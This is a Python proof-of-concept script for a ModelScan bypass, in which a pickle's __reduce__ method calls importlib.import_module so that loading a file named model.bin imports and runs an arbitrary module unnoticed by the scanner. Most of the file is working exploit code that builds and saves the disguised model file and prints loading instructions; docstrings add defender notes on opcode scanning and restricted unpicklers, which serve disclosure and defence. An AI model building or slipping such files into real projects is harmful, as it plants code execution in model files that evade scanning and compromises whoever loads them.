#!/usr/bin/env python3
"""
ModelScan PickleUnsafeOpScan Bypass — importlib.import_module RCE
=================================================================
Vulnerability: ModelScan's PickleUnsafeOpScan only checks unsafe_globals
against a hardcoded blacklist, and 'importlib' is NOT in that blacklist.

As a result, a pickle can import an arbitrary Python module (running its
module-level code) via the __reduce__ mechanism without ModelScan reporting it.
"""
import pickle
import importlib

class ImportlibRCE:
    """Pickle payload whose unpickling resolves to an ``importlib.import_module`` call.

    The pickle protocol serialises whatever ``__reduce__`` returns: a callable
    plus its positional arguments. On load, the unpickler "reconstructs" the
    object by calling that callable, so a pickle made from this class imports
    the module named ``'malice'`` (and therefore runs its module-level code)
    instead of building an instance. Per the module docstring, ModelScan's
    PickleUnsafeOpScan compares referenced globals against a fixed blacklist
    that does not include ``importlib``, so the reference goes unreported.

    Defender notes: the serialised pickle still carries a GLOBAL/STACK_GLOBAL
    opcode naming ``importlib.import_module``. A scanner that walks opcodes
    (``pickletools.genops``) and allow-lists the callables a model file may
    reference — rather than deny-listing known-bad ones — should flag this.
    Never ``pickle.load`` a model file from an untrusted source; prefer
    non-executable formats or a restricted ``Unpickler.find_class``.
    """

    def __reduce__(self):
        # The callable the unpickler will invoke, and the args it receives.
        reducer = importlib.import_module
        reducer_args = ('malice',)
        return (reducer, reducer_args)

if __name__ == '__main__':
    # Serialise the payload once, then persist it under a model-file name.
    # Loading model.bin with pickle.load() executes the embedded import, which
    # is why pickle-based model files from untrusted sources must be
    # opcode-scanned (or loaded through a restricted Unpickler) before use.
    payload = pickle.dumps(ImportlibRCE())
    with open('model.bin', 'wb') as f:
        f.write(payload)
    for line in (
        "[+] Malicious pickle saved to model.bin",
        "[+] Load with: pickle.load(open('model.bin', 'rb'))",
        "[+] Make sure malice.py is in Python path",
    ):
        print(line)